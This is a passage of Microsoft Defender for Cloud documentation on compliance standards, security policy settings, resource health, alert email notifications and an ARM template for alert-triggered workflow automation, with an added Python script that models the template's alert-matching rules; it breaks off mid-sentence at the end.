Microsoft Defender for Cloud continually compares the configuration of your resources with requirements in industry standards, regulations, and benchmarks. The regulatory compliance dashboard provides insights into your compliance posture based on how you're meeting specific compliance requirements.


Tip

Learn more about Defender for Cloud's regulatory compliance dashboard in the common questions.


How are compliance standards represented in Defender for Cloud?


Industry standards, regulatory standards, and benchmarks are represented in Defender 
for Cloud's regulatory compliance dashboard. Each standard is an initiative defined in 
Azure Policy. 


To see compliance data mapped as assessments in your dashboard, add a compliance standard to your management group or subscription from within the Security policy page. To learn more about Azure Policy and initiatives, see Working with security policies.


When you've assigned a standard or benchmark to your selected scope, the standard 
appears in your regulatory compliance dashboard with all associated compliance data 
mapped as assessments. You can also download summary reports for any of the 
standards that have been assigned. 


Microsoft tracks the regulatory standards themselves and automatically improves its 
coverage in some of the packages over time. When Microsoft releases new content for 
the initiative, it appears automatically in your dashboard as new policies mapped to 
controls in the standard. 


What regulatory compliance standards are available in Defender for Cloud?


By default:

• Azure subscriptions get the Microsoft cloud security benchmark assigned. These are the Microsoft-authored, cloud-specific guidelines for security and compliance best practices based on common compliance frameworks. Learn more about Microsoft cloud security benchmark.

• AWS accounts get the AWS Foundational Security Best Practices standard assigned. This is the AWS-specific guideline for security and compliance best practices based on common compliance frameworks.

• GCP projects get the GCP Default standard assigned.


If a subscription, account, or project has any Defender plan enabled, more standards can 
be applied. 


Available regulatory standards:

Standards for Azure subscriptions     | Standards for AWS accounts   | Standards for GCP projects
--------------------------------------|------------------------------|----------------------------
PCI-DSS v3.2.1 (deprecated)           | CIS AWS Foundations v1.2.0   | CIS GCP Foundations v1.1.0
PCI DSS v4                            | CIS AWS Foundations v1.5.0   | CIS GCP Foundations v1.2.0
SOC TSP                               | PCI DSS v3.2.1               | PCI DSS v3.2.1
SOC 2 Type 2                          |                              | NIST 800-53
ISO 27001:2013                        |                              | ISO 27001
CIS Azure Foundations v1.1.0          |                              |
CIS Azure Foundations v1.3.0          |                              |
CIS Azure Foundations v1.4.0          |                              |
CIS Azure Foundations v2.0.0          |                              |
NIST SP 800-53 R4                     |                              |
NIST SP 800-53 R5                     |                              |
NIST SP 800 171 R2                    |                              |
CMMC Level 3                          |                              |
FedRAMP H                             |                              |
FedRAMP M                             |                              |
HIPAA/HITRUST                         |                              |
SWIFT CSP CSCF v2020                  |                              |
UK OFFICIAL and UK NHS                |                              |
Canada Federal PBMM                   |                              |
New Zealand ISM Restricted            |                              |
New Zealand ISM Restricted v3.5       |                              |
Australian Government ISM Protected   |                              |
RMIT Malaysia                         |                              |


Tip

Standards are added to the dashboard as they become available. This table might not contain recently added standards.


Add a regulatory standard to your dashboard

The following steps explain how to add a package to monitor your compliance with one of the supported regulatory standards.

Prerequisites

To add standards to your dashboard:

• The subscription must have one or more Defender plans enabled.
• The user must have owner or policy contributor permissions.

Note

It may take a few hours for a newly added standard to appear in the compliance dashboard.


Add a standard to your Azure subscriptions 


1. From Defender for Cloud's menu, select Regulatory compliance to open the regulatory compliance dashboard. Here you can see the compliance standards assigned to the currently selected subscriptions.

2. From the top of the page, select Manage compliance policies.

3. Select the subscription or management group for which you want to manage the regulatory compliance posture.

   Tip

   We recommend selecting the highest scope for which the standard is applicable so that compliance data is aggregated and tracked for all nested resources.

4. Select Security policy.

5. Expand the Industry & regulatory standards section and select Add more standards.

6. From the Add regulatory compliance standards page, you can search for any of the available standards:


   [Screenshot: the Add regulatory compliance standards page (Home > Microsoft Defender for Cloud | Regulatory compliance > Environment settings > Settings | Security policy). "Click Add on the standards that you want to add to the regulatory compliance dashboard and then assign it to the subscription. After completing the assignment, the custom policies will be available in the Regulatory compliance dashboard." Each row has a Name, a Description and an Add button, for example: NIST SP 800-53 R4 (Track NIST SP 800-53 R4 controls in the Compliance Dashboard, based on a recommended set of policies and assessments), NIST SP 800 171 R2, UKO and UK NHS (Track UK OFFICIAL and UK NHS controls), Canada Federal PBMM, HIPAA HITRUST (Track HIPAA/HITRUST controls).]


7. Select Add and enter all the necessary details for the specific initiative such as 
scope, parameters, and remediation. 


8. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


[Screenshot: the Regulatory compliance dashboard (showing 40 subscriptions) after standards have been added. The toolbar offers Download report, Manage compliance policies, Open query, Compliance over time workbook and Audit reports (Preview), with the notice "You can now fully customize the standards you track in the dashboard. Update your dashboard by selecting 'Manage compliance policies' above." Tabs: Microsoft Cloud Security Benchmark v3, PCI DSS 3.2.1, SOC TSP, HIPAA HITRUST, NIST SP 800 53 R5, NIST SP 800 171 R2, UKO and UK NHS, Canada Federal PBMM. Azure Security Benchmark is applied to 7 subscriptions (3 of 43 passed controls); Lowest compliance regulatory standards lists NIST SP 800 53 R5, UKO and UK NHS and PCI DSS 3.2.1. Control families NS. Network Security, IM. Identity Management, PA. Privileged Access and DP. Data Protection are listed; DP-4. Enable data at rest encryption by default is expanded to show automated assessments for Azure (Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources; Automation account variables should be encrypted; Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign; Transparent Data Encryption on SQL databases should be enabled) and for AWS (Attached EBS volumes should be encrypted at-rest; EBS default encryption should be enabled; Amazon SQS queues should be encrypted at rest), each with its resource type and failed-resource count.]


Assign a standard to your AWS accounts 


To assign regulatory compliance standards on AWS accounts:

1. Navigate to Environment settings.
2. Select the relevant AWS account.
3. Select Standards.




4. Select the three dots alongside an unassigned standard and select Assign standard.


   [Screenshot: Settings | Standards for the AWS account 'MDC_Containers demo' (Microsoft Defender for Cloud | Environment settings). "Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment." The list (showing 1-10 of 22 items) has Name, Recommendations, Type and Assigned on columns, with rows such as CIS AWS Foundations v1.5.0 (Compliance) and custom standards (Custom, Not assigned); the context menu of an unassigned standard offers Assign standard and Delete.]


5. At the prompt, select Yes. The standard is assigned to your AWS account. 


   [Screenshot: confirmation prompt "Assign standard 'Custom standard'": Are you sure you would like to assign standard 'Custom standard'?]


6. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


Assign a standard to your GCP projects

To assign regulatory compliance standards on GCP projects:

1. Navigate to Environment settings.
2. Select the relevant GCP project.
3. Select Standards.
4. Select the three dots alongside an unassigned standard and select Assign standard.


   [Screenshot: Settings | Standards for the GCP project 'mdc-containers-demo2' (Home > Microsoft Defender for Cloud | Environment settings > Settings). Notice: "Custom recommendations are inactive for this scope. To activate custom recommendations, upgrade to Defender CSPM plan." The list (showing 1-10 of 19 items) has Name, Recommendations, Type and Assigned on columns, with rows such as GCP CSPM (Preview) (3 recommendations, Compliance, Not assigned) and several custom standards (Custom, Not assigned); the context menu of an unassigned standard offers View recommendations, Edit, Assign standard and Delete.]


5. At the prompt, select Yes. The standard is assigned to your GCP project. 


   [Screenshot: confirmation prompt "Assign standard 'GCP Custom'": Are you sure you would like to assign standard 'GCP Custom'?]


6. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


Remove a standard from your dashboard 


You can continue to customize the regulatory compliance dashboard, to focus only on 
the standards that are applicable to you, by removing any of the supplied regulatory 
standards that aren't relevant to your organization. 


To remove a standard:

1. From Defender for Cloud's menu, select Security policy.

2. Select the relevant subscription from which you want to remove a standard.

   Note

   You can remove a standard from a subscription, but not from a management group.

   The security policy page opens. For the selected subscription, it shows the default policy, the industry and regulatory standards, and any custom initiatives you've created.


   [Screenshot: Security policy on: Contoso. Policies assigned in this subscription: Microsoft Defender for Cloud default policy; Industry & regulatory standards ("Compliance policies that you can view in the compliance dashboard. To add more compliance standards, click Add more standards."):

   PCI DSS 3.2.1 | Track PCI-DSS v3.2.1:2018 controls in the Compliance Dashboard, based on a recommended set of policies and assessments. | Out of the box | Disable
   ISO 27001 | Track ISO 27001:2013 controls in the Compliance Dashboard, based on a recommended set of policies and assessments. | Out of the box | Disable
   SOC TSP | Track SOC TSP controls in the Compliance Dashboard, based on a recommended set of policies and assessments. | Out of the box | Disable
   NIST SP 800-53 R4 | Track NIST SP 800-53 R4 controls in the Compliance Dashboard, based on a recommended set of policies and assessments. | Manually added | Delete

   Add more standards]


3. For the standard you want to remove, select Disable. A confirmation window 
appears. 


   [Screenshot: Security policy for Contoso, Disable confirmation: "If you disable ISO 27001, it will be removed from your compliance dashboard. Are you sure you want to disable ISO 27001?" with Yes and No buttons.]


4. Select Yes. 


Next steps 


In this article, you learned how to add compliance standards to monitor your 
compliance with regulatory and industry standards. 


For related material, see the following pages: 


• Microsoft cloud security benchmark

• Defender for Cloud regulatory compliance dashboard - Learn how to track and export your regulatory compliance data with Defender for Cloud and external tools

• Working with security policies


Manage security policies

This page explains how security policies are configured, and how to view them in Microsoft Defender for Cloud.


To understand the relationships between initiatives, policies, and recommendations, see 
What are security policies, initiatives, and recommendations? 


Who can edit security policies? 


Defender for Cloud uses Azure role-based access control (Azure RBAC), which provides built-in roles you can assign to Azure users, groups, and services. When users open Defender for Cloud, they see only information related to the resources they can access, meaning the subscriptions on which they hold the owner, contributor, or reader role. There are two specific Defender for Cloud roles that can view and manage security policies:


• Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

• Security admin: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.


You can edit Azure security policies through Defender for Cloud, through Azure Policy, via the REST API, or using PowerShell.


Manage your security policies 


To view your security policies in Defender for Cloud: 


1. From Defender for Cloud's menu, open the Environment settings page. Here, you can see the Azure management groups or subscriptions.

2. Select the relevant subscription or management group whose security policies you want to view.

3. Open the Security policy page.

4. The security policy page for that subscription or management group appears. It shows the available and assigned policies.


   [Screenshot: Settings | Security policy on: CyberSecSOC (Home > Microsoft Defender for Cloud | Environment settings > Settings). Under Default initiative ("The default initiative enabled on your subscription generates the security recommendations in the Recommendations page."), the assignments table reads:

   Assignment | Assigned On | Audit policies | Deny policies | Disabled policies | Exempted policies
   ASC Default (subscription: d...) | Subscription | 195 | 1 | 12 | 0
   [Preview]: Enable Monitoring... | Management group | 193 | 0 | 15 | 0

   Under Industry & regulatory standards ("Compliance initiatives shown in the Regulatory compliance dashboard."): Microsoft cloud security benchmark (Track Microsoft Cloud Security Benchmark controls in the Compliance Dashboard, based on a recommended set of policies and assessments; Out of the box; Disable) and PCI DSS 3.2.1 (Track PCI-DSS v3.2.1:2018 controls in the Compliance Dashboard, based on a recommended set of policies and assessments; Out of the box; Disable).]


Note 

The settings of each recommendation that apply to the scope are compared 
and the cumulative outcome of actions taken by the recommendation 
appears. For example, if in one assignment a recommendation is Disabled, 
but in another it's set to Audit, then the cumulative effect applies Audit. The 
more active effect always takes precedence. 


5. Choose from the available options on this page: 


a. To work with industry standards, select Add more standards. For more 
information, see Customize the set of standards in your regulatory compliance 
dashboard. 


b. To assign and manage custom initiatives, select Add custom initiatives. For 
more information, see Using custom security initiatives and policies. 


c. To view and edit the default initiative, select it and proceed as described below. 


[Screenshot: Security policy page for the ASC Multi-Cloud Demo subscription, showing 
the Default initiative section and the Industry & regulatory standards section with 
Microsoft cloud security benchmark, PCI DSS 3.2.1, ISO 27001 and SOC TSP, each with a 
Disable option, followed by the Add more standards button.] 


This Security policy screen reflects the action taken by the policies assigned on 
the subscription or management group you selected. 

- Use the links at the top to open a policy assignment that applies on the 
  subscription or management group. These links let you access the 
  assignment and manage recommendations. For example, if you see that a 
  particular recommendation is set to the Audit effect, use the link to change it 
  to Deny, or to disable it so that it is no longer evaluated. 

- In the list of recommendations, you can see the effective application of the 
  recommendation on your subscription or management group. 

- The recommendation's effect can be: 

  - Audit evaluates the compliance state of resources according to the 
    recommendation logic. 
  - Deny prevents deployment of non-compliant resources based on the 
    recommendation logic. 
  - Disabled prevents the recommendation from running. 


[Screenshot: the ASC Default (Subscription-Id) policy assignment for CyberSecSOC, 
opened from the Security policy page with an "Open in Azure Policy" link. It lists 
recommendations with their Resource type, Effect (Audit), Exempted resources and 
Additional parameters columns.] 


Enable a security recommendation 


Some recommendations might be disabled by default. For example, in the Azure 
Security Benchmark initiative, some recommendations are provided for you to enable 
only if they meet a specific regulatory or compliance requirement for your organization. 
Examples include recommendations to encrypt data at rest with customer-managed keys, 
such as "Container registries should be encrypted with a customer-managed key 
(CMK)". 


To enable a disabled recommendation and ensure it's assessed for your resources: 

1. From Defender for Cloud's menu, open the Environment settings page. 

2. Select the subscription or management group for which you want to enable a 
   recommendation. 

3. Open the Security policy page. 

4. From the Default initiative section, select the relevant initiative. 

5. Search for the recommendation that you want to enable, either by the search bar 
   or filters. 

6. Select the ellipses menu, then select Manage effect and parameters. 

7. From the Effect section, select Audit. 

8. Select Save. 


[Screenshot: the ASC Default (Subscription-Id) policy assignment for CyberSecSOC with 
the Manage effect and parameters pane open for "Automation account variables should be 
encrypted". The pane offers the Audit, Disabled and Deny effects, a Save button and a 
Reset to default button.] 


Note 

Setting will take effect immediately, but recommendations will update based 
on their freshness interval (up to 12 hours). 


Manage a security recommendation's settings 


It may be necessary to configure additional parameters for some recommendations. As 
an example, diagnostic logging recommendations have a default retention period of 1 
day. You can change the default value if your organizational security requirements 
require logs to be kept for more than that, for example: 30 days. The Additional 
parameters column indicates whether a recommendation has associated additional 
parameters: 

- Default - the recommendation is running with its default configuration 
- Configured - the recommendation's configuration is modified from its default values 
- None - the recommendation doesn't require any additional configuration 


1. From Defender for Cloud's menu, open the Environment settings page. 

2. Select the subscription or management group for which you want to configure a 
   recommendation. 

3. Open the Security policy page. 

4. From the Default initiative section, select the relevant initiative. 

5. Search for the recommendation that you want to configure. 

   Tip 

   To view all available recommendations with additional parameters, use the 
   filters to show the Additional parameters column, then filter on Default. 

6. Select the ellipses menu and select Manage effect and parameters. 

7. From the Additional parameters section, configure the available parameters with 
   new values. 

8. Select Save. 


[Screenshot: the Manage effect and parameters pane for "Container CPU and memory 
limits should be enforced", showing the Audit, Disabled and Deny effects and the 
additional parameters: max allowed CPU units in the Kubernetes cluster (2), max 
allowed memory bytes in the Kubernetes cluster (64Gi), Kubernetes namespaces to 
exclude from monitoring of memory and CPU limits (kube-system, gatekeeper-system, 
azure-arc, azuredefender, mdc) and Kubernetes images to exclude from monitoring of 
all container related policies.] 

Use the "Reset to default" button to revert changes per recommendation and restore 
the default value. 


Disable a security recommendation 


When your security policy triggers a recommendation that's irrelevant for your 
environment, you can prevent that recommendation from appearing again. To disable a 
recommendation, select an initiative and change its settings to disable the relevant 
recommendations. 


The recommendation you want to disable will still appear if it's required for a regulatory 
standard you've applied with Defender for Cloud's regulatory compliance tools. Even if 
you've disabled a recommendation in the built-in initiative, a recommendation in the 
regulatory standard's initiative will still trigger the recommendation if it's necessary for 
compliance. You can't disable recommendations from regulatory standard initiatives. 


Learn more about managing security recommendations. 

1. From Defender for Cloud's menu, open the Environment settings page. 

2. Select the subscription or management group for which you want to disable a 
   recommendation. 

   Note 

   Remember that a management group applies its settings to its subscriptions. 
   If you disabled a subscription's recommendation, and the subscription 
   belongs to a management group that still uses the same settings, then you 
   will continue to receive the recommendation. The security policy settings will 
   still be applied from the management group level and the recommendation will 
   still be generated. 

3. Open the Security policy page. 

4. From the Default initiative section, select the relevant initiative. 

5. Search for the recommendation that you want to disable, either by the search bar 
   or filters. 

6. Select the ellipses menu, then select Manage effect and parameters. 

7. From the Effect section, select Disabled. 

8. Select Save. 


Note 

Setting will take effect immediately, but recommendations will update based 
on their freshness interval (up to 12 hours). 


Next steps 
This page explained security policies. For related information, see the following pages: 

- Learn how to set policies using PowerShell 
- Learn how to edit a security policy in Azure Policy 
- Learn how to set a policy across subscriptions or on management groups using 
  Azure Policy 
- Learn how to enable Defender for Cloud on all subscriptions in a management 
  group 


Tutorial: Investigate the health of your resources 

The resource health page provides a snapshot view of the overall health of a single 
resource. You can review detailed information about the resource and all 
recommendations that apply to that resource. Also, if you're using any of the advanced 
protection plans of Microsoft Defender for Cloud, you can see outstanding security 
alerts for that specific resource too. 


This single page, currently in preview, in Defender for Cloud's portal shows: 


1. Resource information - The resource group and subscription it's attached to, the 
geographic location, and more. 

2. Applied security feature - Whether a Microsoft Defender plan is enabled for the 
resource. 

3. Counts of outstanding recommendations and alerts - The number of outstanding 
security recommendations and Defender for Cloud alerts. 

4. Actionable recommendations and alerts - Two tabs list the recommendations and 
alerts that apply to the resource. 


[Screenshot: the Resource health page for the virtual machine 1809later, with the 
resource information in the left pane and the Recommendations and Alerts tabs on the 
right listing recommendations by severity with a Healthy or Unhealthy status.] 

In this tutorial you'll learn how to: 


- Access the resource health page for all resource types 
- Evaluate the outstanding security issues for a resource 
- Improve the security posture for the resource 


Prerequisites 


To step through the features covered in this tutorial: 


- An Azure subscription. If you don't have an Azure subscription, create a free 
  account before you begin. 

- To apply security recommendations, you must be signed in with an account that 
  has the relevant permissions (Resource Group Contributor, Resource Group Owner, 
  Subscription Contributor, or Subscription Owner). 

- To dismiss alerts, you must be signed in with an account that has the relevant 
  permissions (Security Admin, Subscription Contributor, or Subscription Owner). 


Access the health information for a resource 


Tip 


In the following screenshots, we're opening a virtual machine, but the resource 
health page can show you the details for all resource types. 


To open the resource health page for a resource: 
1. Select any resource from the asset inventory page. 


[Screenshot: the Microsoft Defender for Cloud Inventory page, showing totals for 
resources, unhealthy resources, unmonitored resources and unregistered subscriptions, 
and a list of virtual machines such as 1809later in the Contoso Infra1 subscription with 
their agent installation status.] 


2. Use the left pane of the resource health page for an overview of the subscription, 
   status, and monitoring information about the resource. You can also see whether 
   enhanced security features are enabled for the resource: 


[Screenshot: the left pane of the Resource health page for the virtual machine 
1809later: Monitored, 16 active recommendations, resource information (subscription 
Contoso Infra, resource group rg-test, environment Azure, location eastus, operating 
system Windows, status VM running) and, under Security value, Microsoft Defender for 
Servers: On.] 


3. Use the two tabs on the right pane to review the lists of security recommendations 
and alerts that apply to this resource: 


[Screenshot: the Recommendations tab of the Resource health page, listing 
recommendations such as "All network ports should be restricted on network security 
groups associated to your virtual machine", "System updates should be installed on your 
machines", "Management ports of virtual machines should be protected with just-in-time 
network access control" and "Disk encryption should be applied on virtual machines", 
each with a severity and an Unhealthy or Healthy status.] 


Note 

Microsoft Defender for Cloud uses the terms "healthy" and "unhealthy" to 
describe the security status of a resource. These terms relate to whether the 
resource is compliant with a specific security recommendation. 

In the screenshot above, you can see that recommendations are listed even 
when this resource is "healthy". One advantage of the resource health page is 
that all recommendations are listed so you can get a complete picture of your 
resources' health. 


Evaluate the outstanding security issues for a resource 


The resource health page lists the recommendations for which your resource is 
"unhealthy" and the alerts that are active. 


- To ensure your resource is hardened according to the policies applied to your 
  subscriptions, fix the issues described in the recommendations: 

  1. From the right pane, select a recommendation. 

  2. Continue as instructed on screen. 

  Tip 

  The instructions for fixing issues raised by security recommendations 
  differ for each of Defender for Cloud's recommendations. 

  To decide which recommendations to resolve first, look at the severity of 
  each one and its potential impact on your secure score. 

- To investigate a security alert: 

  1. From the right pane, select an alert. 

  2. Follow the instructions in Respond to security alerts. 


Next steps 
In this tutorial, you learned about using Defender for Cloud's resource health page. 
To learn more, see these related pages: 


- Respond to security alerts 
- Review your security recommendations 


Quickstart: Configure email notifications for security alerts 

Security alerts need to reach the right people in your organization. By default, Microsoft 
Defender for Cloud emails subscription owners whenever a high-severity alert is 
triggered for their subscription. This page explains how to customize these notifications. 


Use Defender for Cloud's Email notifications settings page to define preferences for 
notification emails including: 


- who should be notified - Emails can be sent to select individuals or to anyone with 
  a specified Azure role for a subscription. 

- what they should be notified about - Modify the severity levels for which 
  Defender for Cloud should send out notifications. 


To avoid alert fatigue, Defender for Cloud limits the volume of outgoing mails. For each 
subscription, Defender for Cloud sends: 


- approximately four emails per day for high-severity alerts 
- approximately two emails per day for medium-severity alerts 
- approximately one email per day for low-severity alerts 


[Screenshot: Settings | Email notifications page for the Contoso subscription. Email 
recipients: all users with the Owner role, plus additional email addresses separated by 
commas. Notification types: notify about alerts with severity High or higher. The page 
states that you'll receive a maximum of one email per 6 hours for high-severity alerts, 
one email per 12 hours for medium-severity alerts and one email per 24 hours for 
low-severity alerts.] 


Availability 


Aspect                          Details 
Release state:                  General availability (GA) 
Pricing:                        Email notifications are free; for security alerts, enable the 
                                enhanced security plans (plan pricing) 
Required roles and permissions: Security Admin, Subscription Owner, Contributor 
Clouds:                         Commercial clouds; National (Azure Government, Microsoft 
                                Azure operated by 21Vianet) 


Customize the security alerts email notifications via the portal 
You can send email notifications to individuals or to all users with specific Azure roles. 


1. From Defender for Cloud's Environment settings area, select the relevant 
subscription, and open Email notifications. 


2. Define the recipients for your notifications with one or both of these options: 


- From the dropdown list, select from the available roles. 
- Enter specific email addresses separated by commas. There's no limit to the 
  number of email addresses that you can enter. 


3. To apply the security contact information to your subscription, select Save. 


Customize the alerts email notifications through the API 


You can also manage your email notifications through the supplied REST API. For full 
details, see the SecurityContacts API documentation. 


This is an example request body for the PUT request when creating a security contact 
configuration: 


URI: 
https://management.azure.com/subscriptions/<SubscriptionId>/providers/Microsoft.Security/securityContacts/default?api-version=2020-01-01-preview 


JSON 

    { 
      "properties": { 
        "emails": "admin@contoso.com;admin2@contoso.com", 
        "notificationsByRole": { 
          "state": "On", 
          "roles": ["AccountAdmin", "Owner"] 
        }, 
        "alertNotifications": { 
          "state": "On", 
          "minimalSeverity": "Medium" 
        }, 
        "phone": "" 
      } 
    } 


Next steps 
To learn more about security alerts, see the following pages: 


- Security alerts - a reference guide - Learn about the security alerts you might see 
  in Microsoft Defender for Cloud's Threat Protection module. 

- Manage and respond to security alerts in Microsoft Defender for Cloud - Learn 
  how to manage and respond to security alerts. 

- Workflow automation - Automate responses to alerts with custom notification 
  logic. 


Quickstart: Create an automatic response to a specific security alert using an ARM 
template or Bicep 

In this quickstart, you'll learn how to use an Azure Resource Manager template (ARM 
template) or a Bicep file to create a workflow automation. The workflow automation will 
trigger a logic app when specific security alerts are received by Microsoft Defender for 
Cloud. 


Prerequisites 


If you don't have an Azure subscription, create a free account before you begin. 


For a list of the roles and permissions required to work with Microsoft Defender for 
Cloud's workflow automation feature, see workflow automation. 


The examples in this quickstart assume you have an existing Logic App. To deploy the 
example, you pass in parameters that contain the logic app name and resource group. 
For information about deploying a logic app, see Quickstart: Create and deploy a 
Consumption logic app workflow in multi-tenant Azure Logic Apps with Bicep or 
Quickstart: Create and deploy a Consumption logic app workflow in multi-tenant Azure 
Logic Apps with an ARM template. 


ARM template tutorial 


A resource manager template is a JavaScript Object Notation (JSON) file that defines the 
infrastructure and configuration for your project. The template uses declarative syntax. 
In declarative syntax, you describe your intended deployment without writing the 
sequence of programming commands to create the deployment. 


If your environment meets the prerequisites and you're familiar with using ARM 
templates, select the Deploy to Azure button. The template will open in the Azure 
portal. 


[Deploy to Azure button] 


Review the template 


The template used in this quickstart is from Azure Quickstart Templates. 


JSON 

    { 
      "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 
      "contentVersion": "1.0.0.0", 
      "metadata": { 
        "_generator": { 
          "name": "bicep", 
          "version": "<bicep-version>", 
          "templateHash": "5191074894407113732" 
        } 
      }, 
      "parameters": { 
        "automationName": { 
          "type": "string", 
          "maxLength": 24, 
          "minLength": 3 
        }, 
        "location": { 
          "type": "string", 
          "defaultValue": "[resourceGroup().location]", 
          "metadata": { 
            "description": "Location for the automation" 
          } 
        }, 
        "logicAppName": { 
          "type": "string", 
          "minLength": 3 
        }, 
        "logicAppResourceGroupName": { 
          "type": "string", 
          "minLength": 3 
        }, 
        "subscriptionId": { 
          "type": "string", 
          "defaultValue": "[subscription().subscriptionId]", 
          "metadata": { 
            "description": "The Azure resource GUID id of the subscription" 
          } 
        }, 
        "alertSettings": { 
          "type": "object", 
          "metadata": { 
            "description": "The alert settings object used for deploying the automation" 
          } 
        } 
      }, 
      "variables": { 
        "automationDescription": "automation description for subscription {0}", 
        "scopeDescription": "automation scope for subscription {0}" 
      }, 
      "resources": [ 
        { 
          "type": "Microsoft.Security/automations", 
          "apiVersion": "2019-01-01-preview", 
          "name": "[parameters('automationName')]", 
          "location": "[parameters('location')]", 
          "properties": { 
            "description": "[format(variables('automationDescription'), parameters('subscriptionId'))]", 
            "isEnabled": true, 
            "actions": [ 
              { 
                "actionType": "LogicApp", 
                "logicAppResourceId": "[resourceId('Microsoft.Logic/workflows', parameters('logicAppName'))]", 
                "uri": "[listCallbackURL(resourceId(parameters('subscriptionId'), parameters('logicAppResourceGroupName'), 'Microsoft.Logic/workflows/triggers', parameters('logicAppName'), 'manual'), '2019-05-01').value]" 
              } 
            ], 
            "scopes": [ 
              { 
                "description": "[format(variables('scopeDescription'), parameters('subscriptionId'))]", 
                "scopePath": "[subscription().id]" 
              } 
            ], 
            "sources": [ 
              { 
                "copy": [ 
                  { 
                    "name": "ruleSets", 
                    "count": "[length(range(0, length(parameters('alertSettings').alertSeverityMapping)))]", 
                    "input": { 
                      "rules": [ 
                        { 
                          "propertyJPath": "[parameters('alertSettings').alertSeverityMapping[range(0, length(parameters('alertSettings').alertSeverityMapping))[copyIndex('ruleSets')]].jpath]", 
                          "propertyType": "String", 
                          "expectedValue": "[parameters('alertSettings').alertSeverityMapping[range(0, length(parameters('alertSettings').alertSeverityMapping))[copyIndex('ruleSets')]].expectedValue]", 
                          "operator": "[parameters('alertSettings').alertSeverityMapping[range(0, length(parameters('alertSettings').alertSeverityMapping))[copyIndex('ruleSets')]].operator]" 
                        }, 
                        { 
                          "propertyJPath": "Severity", 
                          "propertyType": "String", 
                          "expectedValue": "[parameters('alertSettings').alertSeverityMapping[range(0, length(parameters('alertSettings').alertSeverityMapping))[copyIndex('ruleSets')]].severity]", 
                          "operator": "Equals" 
                        } 
                      ] 
                    } 
                  } 
                ], 
                "eventSource": "Alerts" 
              } 
            ] 
          } 
        } 
      ] 
    } 
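The copy loop and rule expressions in the template are hard to read on their own. The following Python script is an added illustration, not code from the quickstart or from the Azure Quickstart Templates repository: it expands a constructed alertSettings value into the same rule sets the template's ruleSets copy loop produces, then evaluates them against constructed sample alerts. The field names jpath, expectedValue, operator and severity are the ones the template's expressions read; the operator semantics, the sample alerts and the matching logic itself are assumptions that model the emitted rule sets locally rather than reproduce Defender for Cloud's engine.

```python
"""Local model of the rule sets emitted by the workflow-automation template.

Added illustration, not part of the quickstart or the Azure Quickstart
Templates repository. Assumptions (also marked in the comments):
- each alertSeverityMapping entry carries the four fields the template's
  expressions read: jpath, expectedValue, operator and severity;
- the String operators Equals, NotEquals, Contains, StartsWith and EndsWith
  behave as their names suggest, and Severity is compared with Equals,
  exactly as the template's second rule does;
- this models the rule sets the template emits; it is not Defender for
  Cloud's own matching engine.
"""
from __future__ import annotations

from typing import Any

# Constructed sample value for the template's ``alertSettings`` parameter:
# forward alerts whose display name contains "SQL" at High or Medium severity.
ALERT_SETTINGS: dict[str, Any] = {
    "alertSeverityMapping": [
        {"jpath": "AlertDisplayName", "expectedValue": "SQL",
         "operator": "Contains", "severity": "High"},
        {"jpath": "AlertDisplayName", "expectedValue": "SQL",
         "operator": "Contains", "severity": "Medium"},
    ]
}

# Constructed sample alerts; only the two properties the rules read are needed.
SAMPLE_ALERTS: list[dict[str, Any]] = [
    {"AlertDisplayName": "Suspicious SQL login attempt", "Severity": "High"},
    {"AlertDisplayName": "Suspicious SQL login attempt", "Severity": "Low"},
    {"AlertDisplayName": "Unusual sign-in to a virtual machine", "Severity": "High"},
]


def expand_rule_sets(alert_settings: dict[str, Any]) -> list[dict[str, Any]]:
    """Mirror the template's ``copy`` block: one rule set per mapping entry
    (``copyIndex('ruleSets')`` walks ``range(0, length(mapping))``), each holding
    the caller-defined rule followed by the fixed ``Severity Equals`` rule."""
    rule_sets = []
    for entry in alert_settings["alertSeverityMapping"]:
        rule_sets.append({
            "rules": [
                {"propertyJPath": entry["jpath"], "propertyType": "String",
                 "expectedValue": entry["expectedValue"], "operator": entry["operator"]},
                {"propertyJPath": "Severity", "propertyType": "String",
                 "expectedValue": entry["severity"], "operator": "Equals"},
            ]
        })
    return rule_sets


def _lookup(alert: dict[str, Any], jpath: str) -> str | None:
    """Resolve a dotted JPath such as ``Entities.0.Name`` against the alert.
    Assumption: the page only shows top-level names such as ``Severity``."""
    node: Any = alert
    for part in jpath.split("."):
        if isinstance(node, list) and part.isdigit():
            node = node[int(part)] if int(part) < len(node) else None
        elif isinstance(node, dict):
            node = node.get(part)
        else:
            return None
        if node is None:
            return None
    return str(node)


def _rule_matches(alert: dict[str, Any], rule: dict[str, Any]) -> bool:
    """Evaluate one String rule; a property missing from the alert never matches."""
    value = _lookup(alert, rule["propertyJPath"])
    if value is None:
        return False
    expected, op = rule["expectedValue"], rule["operator"]
    ops = {  # assumed semantics of the String operators
        "Equals": value == expected,
        "NotEquals": value != expected,
        "Contains": expected in value,
        "StartsWith": value.startswith(expected),
        "EndsWith": value.endswith(expected),
    }
    if op not in ops:
        raise ValueError(f"unsupported operator: {op}")
    return ops[op]


def automation_fires(alert: dict[str, Any], rule_sets: list[dict[str, Any]]) -> bool:
    """Rules inside one rule set are ANDed and rule sets are ORed, so an alert
    triggers the logic app when any single mapping entry fully matches it."""
    return any(all(_rule_matches(alert, r) for r in rs["rules"]) for rs in rule_sets)


def matching_alerts(alerts: list[dict[str, Any]],
                    alert_settings: dict[str, Any]) -> list[str]:
    """Return the display names of the alerts that would trigger the automation."""
    rule_sets = expand_rule_sets(alert_settings)
    return [a["AlertDisplayName"] for a in alerts if automation_fires(a, rule_sets)]


if __name__ == "__main__":
    for name in matching_alerts(SAMPLE_ALERTS, ALERT_SETTINGS):
        print("would trigger the logic app:", name)
```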


Relevant resources 


- Microsoft.Security/automations: The automation that will trigger the logic app, 
